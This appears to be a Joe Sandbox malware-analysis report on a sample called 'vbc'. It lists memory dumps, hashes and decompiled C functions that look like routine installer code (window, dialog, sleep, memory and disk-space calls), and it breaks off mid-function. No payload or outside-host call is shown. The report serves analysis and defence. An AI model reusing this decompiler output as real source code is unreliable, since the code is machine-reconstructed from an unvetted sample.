                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                    • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                    • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                    • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00404498(int _a4) {
                    				int _t2;
                    
                    				_t2 = EnableWindow( *0x7a1f44, _a4); // executed
                    				return _t2;
                    			}




                    0x004044a2
                    0x004044a8

                    APIs
                    • KiUserCallbackDispatcher.NTDLL(?,0040426F), ref: 004044A2
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID:
                    • API String ID: 2492992576-0
                    • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                    • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                    • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                    • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 51%
                    			E734F2B98(void* __ecx, intOrPtr _a4) {
                    				signed int _v8;
                    				void* _t28;
                    				void* _t29;
                    				int _t33;
                    				void* _t37;
                    				void* _t40;
                    				void* _t45;
                    				void* _t49;
                    				signed int _t56;
                    				void* _t61;
                    				void* _t70;
                    				intOrPtr _t72;
                    				signed int _t77;
                    				intOrPtr _t79;
                    				intOrPtr _t80;
                    				void* _t81;
                    				void* _t87;
                    				void* _t88;
                    				void* _t89;
                    				void* _t90;
                    				intOrPtr _t93;
                    				intOrPtr _t94;
                    
                    				if( *0x734f5050 != 0 && E734F2ADB(_a4) == 0) {
                    					 *0x734f5054 = _t93;
                    					if( *0x734f504c != 0) {
                    						_t93 =  *0x734f504c;
                    					} else {
                    						E734F30C0(E734F2AD5(), __ecx);
                    						 *0x734f504c = _t93;
                    					}
                    				}
                    				_t28 = E734F2B09(_a4);
                    				_t94 = _t93 + 4;
                    				if(_t28 <= 0) {
                    					L9:
                    					_t29 = E734F2AFD();
                    					_t72 = _a4;
                    					_t79 =  *0x734f5058;
                    					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                    					 *0x734f5058 = _t72;
                    					E734F2AF7();
                    					_t33 = CloseHandle(??); // executed
                    					 *0x734f5034 = _t33;
                    					 *0x734f5038 = _t79;
                    					if( *0x734f5050 != 0 && E734F2ADB( *0x734f5058) == 0) {
                    						 *0x734f504c = _t94;
                    						_t94 =  *0x734f5054;
                    					}
                    					_t80 =  *0x734f5058;
                    					_a4 = _t80;
                    					 *0x734f5058 =  *((intOrPtr*)(E734F2AFD() + _t80));
                    					_t37 = E734F2AE9(_t80);
                    					_pop(_t81);
                    					if(_t37 != 0) {
                    						_t40 = E734F2B09(_t81);
                    						if(_t40 > 0) {
                    							_push(_t40);
                    							_push(E734F2B14() + _a4 + _v8);
                    							_push(E734F2B1E());
                    							if( *0x734f5050 <= 0 || E734F2ADB(_a4) != 0) {
                    								_pop(_t88);
                    								_pop(_t45);
                    								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                    								if(__eflags == 0) {
                    								}
                    								asm("loop 0xfffffff5");
                    							} else {
                    								_pop(_t89);
                    								_pop(_t49);
                    								 *0x734f504c =  *0x734f504c +  *(_t89 + _t49) * 4;
                    								asm("loop 0xffffffeb");
                    							}
                    						}
                    					}
                    					_t107 =  *0x734f5058;
                    					if( *0x734f5058 == 0) {
                    						 *0x734f504c = 0;
                    					}
                    					E734F2B42(_t107, _a4,  *0x734f5034,  *0x734f5038);
                    					return _a4;
                    				}
                    				_push(E734F2B14() + _a4);
                    				_t56 = E734F2B1A();
                    				_v8 = _t56;
                    				_t77 = _t28;
                    				_push(_t68 + _t56 * _t77);
                    				_t70 = E734F2B26();
                    				_t87 = E734F2B22();
                    				_t90 = E734F2B1E();
                    				_t61 = _t77;
                    				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                    					_push( *((intOrPtr*)(_t70 + _t61)));
                    				}
                    				_push( *((intOrPtr*)(_t87 + _t61)));
                    				asm("loop 0xfffffff1");
                    				goto L9;
                    			}

























                    0x734f2ba8
                    0x734f2bb9
                    0x734f2bc6
                    0x734f2bda
                    0x734f2bc8
                    0x734f2bcd
                    0x734f2bd2
                    0x734f2bd2
                    0x734f2bc6
                    0x734f2be3
                    0x734f2be8
                    0x734f2bee
                    0x734f2c32
                    0x734f2c32
                    0x734f2c37
                    0x734f2c3c
                    0x734f2c42
                    0x734f2c44
                    0x734f2c4a
                    0x734f2c57
                    0x734f2c59
                    0x734f2c5e
                    0x734f2c6b
                    0x734f2c7e
                    0x734f2c84
                    0x734f2c8a
                    0x734f2c8b
                    0x734f2c91
                    0x734f2c9d
                    0x734f2ca3
                    0x734f2cab
                    0x734f2cac
                    0x734f2caf
                    0x734f2cba
                    0x734f2cbc
                    0x734f2cc8
                    0x734f2cce
                    0x734f2cd6
                    0x734f2d02
                    0x734f2d03
                    0x734f2d05
                    0x734f2d09
                    0x734f2d09
                    0x734f2d10
                    0x734f2ce6
                    0x734f2ce6
                    0x734f2ce7
                    0x734f2cf5
                    0x734f2cfe
                    0x734f2cfe
                    0x734f2cd6
                    0x734f2cba
                    0x734f2d12
                    0x734f2d19
                    0x734f2d1b
                    0x734f2d1b
                    0x734f2d34
                    0x734f2d42
                    0x734f2d42
                    0x734f2bf9
                    0x734f2bfa
                    0x734f2bff
                    0x734f2c03
                    0x734f2c08
                    0x734f2c1c
                    0x734f2c1d
                    0x734f2c1e
                    0x734f2c20
                    0x734f2c25
                    0x734f2c27
                    0x734f2c27
                    0x734f2c2a
                    0x734f2c30
                    0x00000000

                    APIs
                    • CloseHandle.KERNELBASE(00000000), ref: 734F2C57
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: CloseHandle
                    • String ID:
                    • API String ID: 2962429428-0
                    • Opcode ID: e7de7b7b0c7ae93f4be26a83b2215c45bde418c996473e92cb2df22f5216d605
                    • Instruction ID: 3008c4729daa29f1805bfd2638cc72c0db86409091a07e19f0e7cfeae9e7f6e5
                    • Opcode Fuzzy Hash: e7de7b7b0c7ae93f4be26a83b2215c45bde418c996473e92cb2df22f5216d605
                    • Instruction Fuzzy Hash: C641B4BA90030FEFEB1DEF65D840B4937B9EB04310F3C846AE809E6240D6399591CBD9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004014D7(intOrPtr __edx) {
                    				long _t3;
                    				void* _t7;
                    				intOrPtr _t10;
                    				void* _t13;
                    
                    				_t10 = __edx;
                    				_t3 = E00402D84(_t7);
                    				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                    				if(_t3 <= 1) {
                    					_t3 = 1;
                    				}
                    				Sleep(_t3); // executed
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t13 - 4));
                    				return 0;
                    			}







                    0x004014d7
                    0x004014d8
                    0x004014e1
                    0x004014e4
                    0x004014e8
                    0x004014e8
                    0x004014ea
                    0x00402c2d
                    0x00402c39

                    APIs
                    • Sleep.KERNELBASE(00000000), ref: 004014EA
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
                    • Instruction ID: 3b5dc4dfeaf44569f9deb2ecf0de9c371932af0cf72a0f4646a25a2108455337
                    • Opcode Fuzzy Hash: 37e8cdb3e959b6eccc3643533ee898bd9fefd3c7d67a49354a1a021ca5fec273
                    • Instruction Fuzzy Hash: E0D05E73A141018BD704EBB8BE8545E73A8EB503193208C37D402E1091EA7888564618
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E734F12BB() {
                    				void* _t3;
                    
                    				_t3 = GlobalAlloc(0x40,  *0x734f506c +  *0x734f506c); // executed
                    				return _t3;
                    			}




                    0x734f12c5
                    0x734f12cb

                    APIs
                    • GlobalAlloc.KERNELBASE(00000040,?,734F12DB,?,734F137F,00000019,734F11CA,-000000A0), ref: 734F12C5
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: AllocGlobal
                    • String ID:
                    • API String ID: 3761449716-0
                    • Opcode ID: 9abd62e683059c3f883a8de7731000c3b8e241a558b507abbd516b4cd8cf727e
                    • Instruction ID: a5d55a0a2c86de2687b112a5e5bf2a3379e8158191361fea0eaf8438d5e8535e
                    • Opcode Fuzzy Hash: 9abd62e683059c3f883a8de7731000c3b8e241a558b507abbd516b4cd8cf727e
                    • Instruction Fuzzy Hash: 4BB012B2A00001FFEE04AB65CC06F3432D4E700301F1C4040F608F0280C52049208534
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E00404967(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				signed int _v12;
                    				long _v16;
                    				long _v20;
                    				long _v24;
                    				char _v28;
                    				intOrPtr _v32;
                    				long _v36;
                    				char _v40;
                    				unsigned int _v44;
                    				signed int _v48;
                    				WCHAR* _v56;
                    				intOrPtr _v60;
                    				intOrPtr _v64;
                    				intOrPtr _v68;
                    				WCHAR* _v72;
                    				void _v76;
                    				struct HWND__* _v80;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t82;
                    				long _t87;
                    				short* _t89;
                    				void* _t95;
                    				signed int _t96;
                    				int _t109;
                    				signed short _t114;
                    				signed int _t118;
                    				struct HWND__** _t122;
                    				intOrPtr* _t138;
                    				WCHAR* _t146;
                    				unsigned int _t150;
                    				signed int _t152;
                    				unsigned int _t156;
                    				signed int _t158;
                    				signed int* _t159;
                    				signed int* _t160;
                    				struct HWND__* _t166;
                    				struct HWND__* _t167;
                    				int _t169;
                    				unsigned int _t197;
                    
                    				_t156 = __edx;
                    				_t82 =  *0x7a0f20; // 0x9f0f84
                    				_v32 = _t82;
                    				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
                    				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                    				if(_a8 == 0x40b) {
                    					E00405B5E(0x3fb, _t146);
                    					E004067A1(_t146);
                    				}
                    				_t167 = _a4;
                    				if(_a8 != 0x110) {
                    					L8:
                    					if(_a8 != 0x111) {
                    						L20:
                    						if(_a8 == 0x40f) {
                    							L22:
                    							_v8 = _v8 & 0x00000000;
                    							_v12 = _v12 & 0x00000000;
                    							E00405B5E(0x3fb, _t146);
                    							if(E00405EF1(_t186, _t146) == 0) {
                    								_v8 = 1;
                    							}
                    							E0040651A(0x79ff18, _t146);
                    							_t87 = E004068E7(1);
                    							_v16 = _t87;
                    							if(_t87 == 0) {
                    								L30:
                    								E0040651A(0x79ff18, _t146);
                    								_t89 = E00405E94(0x79ff18);
                    								_t158 = 0;
                    								if(_t89 != 0) {
                    									 *_t89 = 0;
                    								}
                    								if(GetDiskFreeSpaceW(0x79ff18,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                    									goto L35;
                    								} else {
                    									_t169 = 0x400;
                    									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                    									asm("cdq");
                    									_v48 = _t109;
                    									_v44 = _t156;
                    									_v12 = 1;
                    									goto L36;
                    								}
                    							} else {
                    								_t159 = 0;
                    								if(0 == 0x79ff18) {
                    									goto L30;
                    								} else {
                    									goto L26;
                    								}
                    								while(1) {
                    									L26:
                    									_t114 = _v16(0x79ff18,  &_v48,  &_v28,  &_v40);
                    									if(_t114 != 0) {
                    										break;
                    									}
                    									if(_t159 != 0) {
                    										 *_t159 =  *_t159 & _t114;
                    									}
                    									_t160 = E00405E35(0x79ff18);
                    									 *_t160 =  *_t160 & 0x00000000;
                    									_t159 = _t160;
                    									 *_t159 = 0x5c;
                    									if(_t159 != 0x79ff18) {
                    										continue;
                    									} else {
                    										goto L30;
                    									}
                    								}
                    								_t150 = _v44;
                    								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                    								_v44 = _t150 >> 0xa;
                    								_v12 = 1;
                    								_t158 = 0;
                    								__eflags = 0;
                    								L35:
                    								_t169 = 0x400;
                    								L36:
                    								_t95 = E00404E04(5);
                    								if(_v12 != _t158) {
                    									_t197 = _v44;
                    									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                    										_v8 = 2;
                    									}
                    								}
                    								if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != _t158) {
                    									E00404DEC(0x3ff, 0xfffffffb, _t95);
                    									if(_v12 == _t158) {
                    										SetDlgItemTextW(_a4, _t169, 0x79ff08);
                    									} else {
                    										E00404D23(_t169, 0xfffffffc, _v48, _v44);
                    									}
                    								}
                    								_t96 = _v8;
                    								 *0x7a8b04 = _t96;
                    								if(_t96 == _t158) {
                    									_v8 = E0040140B(7);
                    								}
                    								if(( *(_v32 + 0x14) & _t169) != 0) {
                    									_v8 = _t158;
                    								}
                    								E00404498(0 | _v8 == _t158);
                    								if(_v8 == _t158 &&  *0x7a1f38 == _t158) {
                    									E004048C0();
                    								}
                    								 *0x7a1f38 = _t158;
                    								goto L53;
                    							}
                    						}
                    						_t186 = _a8 - 0x405;
                    						if(_a8 != 0x405) {
                    							goto L53;
                    						}
                    						goto L22;
                    					}
                    					_t118 = _a12 & 0x0000ffff;
                    					if(_t118 != 0x3fb) {
                    						L12:
                    						if(_t118 == 0x3e9) {
                    							_t152 = 7;
                    							memset( &_v76, 0, _t152 << 2);
                    							_v80 = _t167;
                    							_v72 = 0x7a1f48;
                    							_v60 = E00404CBD;
                    							_v56 = _t146;
                    							_v68 = E00406557(_t146, 0x7a1f48, _t167, 0x7a0720, _v12);
                    							_t122 =  &_v80;
                    							_v64 = 0x41;
                    							__imp__SHBrowseForFolderW(_t122);
                    							if(_t122 == 0) {
                    								_a8 = 0x40f;
                    							} else {
                    								__imp__CoTaskMemFree(_t122);
                    								E00405DE9(_t146);
                    								_t125 =  *((intOrPtr*)( *0x7a8a70 + 0x11c));
                    								if( *((intOrPtr*)( *0x7a8a70 + 0x11c)) != 0 && _t146 == 0x7b3800) {
                    									E00406557(_t146, 0x7a1f48, _t167, 0, _t125);
                    									if(lstrcmpiW(0x7a6a00, 0x7a1f48) != 0) {
                    										lstrcatW(_t146, 0x7a6a00);
                    									}
                    								}
                    								 *0x7a1f38 =  *0x7a1f38 + 1;
                    								SetDlgItemTextW(_t167, 0x3fb, _t146);
                    							}
                    						}
                    						goto L20;
                    					}
                    					if(_a12 >> 0x10 != 0x300) {
                    						goto L53;
                    					}
                    					_a8 = 0x40f;
                    					goto L12;
                    				} else {
                    					_t166 = GetDlgItem(_t167, 0x3fb);
                    					if(E00405E60(_t146) != 0 && E00405E94(_t146) == 0) {
                    						E00405DE9(_t146);
                    					}
                    					 *0x7a7a38 = _t167;
                    					SetWindowTextW(_t166, _t146);
                    					_push( *((intOrPtr*)(_a16 + 0x34)));
                    					_push(1);
                    					E00404476(_t167);
                    					_push( *((intOrPtr*)(_a16 + 0x30)));
                    					_push(0x14);
                    					E00404476(_t167);
                    					E004044AB(_t166);
                    					_t138 = E004068E7(8);
                    					if(_t138 == 0) {
                    						L53:
                    						return E004044DD(_a8, _a12, _a16);
                    					} else {
                    						 *_t138(_t166, 1);
                    						goto L8;
                    					}
                    				}
                    			}













































                    0x00404967
                    0x0040496d
                    0x00404973
                    0x00404980
                    0x0040498e
                    0x00404991
                    0x00404999
                    0x0040499f
                    0x0040499f
                    0x004049ab
                    0x004049ae
                    0x00404a1c
                    0x00404a23
                    0x00404afa
                    0x00404b01
                    0x00404b10
                    0x00404b10
                    0x00404b14
                    0x00404b1e
                    0x00404b2b
                    0x00404b2d
                    0x00404b2d
                    0x00404b3b
                    0x00404b42
                    0x00404b49
                    0x00404b4c
                    0x00404b88
                    0x00404b8a
                    0x00404b90
                    0x00404b95
                    0x00404b99
                    0x00404b9b
                    0x00404b9b
                    0x00404bb7
                    0x00000000
                    0x00404bb9
                    0x00404bbc
                    0x00404bca
                    0x00404bd0
                    0x00404bd1
                    0x00404bd4
                    0x00404bd7
                    0x00000000
                    0x00404bd7
                    0x00404b4e
                    0x00404b50
                    0x00404b54
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404b56
                    0x00404b56
                    0x00404b63
                    0x00404b68
                    0x00000000
                    0x00000000
                    0x00404b6c
                    0x00404b6e
                    0x00404b6e
                    0x00404b77
                    0x00404b79
                    0x00404b7e
                    0x00404b81
                    0x00404b86
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404b86
                    0x00404be3
                    0x00404bed
                    0x00404bf0
                    0x00404bf3
                    0x00404bfa
                    0x00404bfa
                    0x00404bfc
                    0x00404bfc
                    0x00404c01
                    0x00404c03
                    0x00404c0b
                    0x00404c12
                    0x00404c14
                    0x00404c1f
                    0x00404c1f
                    0x00404c14
                    0x00404c2f
                    0x00404c39
                    0x00404c41
                    0x00404c5c
                    0x00404c43
                    0x00404c4c
                    0x00404c4c
                    0x00404c41
                    0x00404c61
                    0x00404c66
                    0x00404c6b
                    0x00404c74
                    0x00404c74
                    0x00404c7d
                    0x00404c7f
                    0x00404c7f
                    0x00404c8b
                    0x00404c93
                    0x00404c9d
                    0x00404c9d
                    0x00404ca2
                    0x00000000
                    0x00404ca2
                    0x00404b4c
                    0x00404b03
                    0x00404b0a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404b0a
                    0x00404a29
                    0x00404a32
                    0x00404a4c
                    0x00404a51
                    0x00404a5b
                    0x00404a62
                    0x00404a6e
                    0x00404a71
                    0x00404a74
                    0x00404a7b
                    0x00404a83
                    0x00404a86
                    0x00404a8a
                    0x00404a91
                    0x00404a99
                    0x00404af3
                    0x00404a9b
                    0x00404a9c
                    0x00404aa3
                    0x00404aad
                    0x00404ab5
                    0x00404ac2
                    0x00404ad6
                    0x00404ada
                    0x00404ada
                    0x00404ad6
                    0x00404adf
                    0x00404aec
                    0x00404aec
                    0x00404a99
                    0x00000000
                    0x00404a51
                    0x00404a3f
                    0x00000000
                    0x00000000
                    0x00404a45
                    0x00000000
                    0x004049b0
                    0x004049bd
                    0x004049c6
                    0x004049d3
                    0x004049d3
                    0x004049da
                    0x004049e0
                    0x004049e9
                    0x004049ec
                    0x004049ef
                    0x004049f7
                    0x004049fa
                    0x004049fd
                    0x00404a03
                    0x00404a0a
                    0x00404a11
                    0x00404ca8
                    0x00404cba
                    0x00404a17
                    0x00404a1a
                    0x00000000
                    0x00404a1a
                    0x00404a11

                    APIs
                    • GetDlgItem.USER32(?,000003FB), ref: 004049B6
                    • SetWindowTextW.USER32 ref: 004049E0
                    • SHBrowseForFolderW.SHELL32(?), ref: 00404A91
                    • CoTaskMemFree.OLE32(00000000), ref: 00404A9C
                    • lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 00404ACE
                    • lstrcatW.KERNEL32 ref: 00404ADA
                    • SetDlgItemTextW.USER32 ref: 00404AEC
                      • Part of subcall function 00405B5E: GetDlgItemTextW.USER32 ref: 00405B71
                      • Part of subcall function 004067A1: CharNextW.USER32(?), ref: 00406804
                      • Part of subcall function 004067A1: CharNextW.USER32(?), ref: 00406813
                      • Part of subcall function 004067A1: CharNextW.USER32(?), ref: 00406818
                      • Part of subcall function 004067A1: CharPrevW.USER32(?,?), ref: 0040682B
                    • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404BAF
                    • MulDiv.KERNEL32 ref: 00404BCA
                      • Part of subcall function 00404D23: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
                      • Part of subcall function 00404D23: wsprintfW.USER32 ref: 00404DCD
                      • Part of subcall function 00404D23: SetDlgItemTextW.USER32 ref: 00404DE0
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                    • String ID: A$Call
                    • API String ID: 2624150263-209694386
                    • Opcode ID: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
                    • Instruction ID: 86dd0b9b094f85dab2cef093751cf510b28304c980c81074e8bd76ad65710a38
                    • Opcode Fuzzy Hash: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
                    • Instruction Fuzzy Hash: 4DA190B1901208ABDB11EFA5CD45AEF77B8EF84314F11803BF601B62D1DB7C9A418B69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E004021AA(void* __eflags) {
                    				signed int _t52;
                    				void* _t56;
                    				intOrPtr* _t60;
                    				intOrPtr _t61;
                    				intOrPtr* _t62;
                    				intOrPtr* _t64;
                    				intOrPtr* _t66;
                    				intOrPtr* _t68;
                    				intOrPtr* _t70;
                    				intOrPtr* _t72;
                    				intOrPtr* _t74;
                    				intOrPtr* _t76;
                    				intOrPtr* _t78;
                    				intOrPtr* _t80;
                    				void* _t83;
                    				intOrPtr* _t91;
                    				signed int _t101;
                    				signed int _t105;
                    				void* _t107;
                    
                    				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                    				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                    				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                    				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                    				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
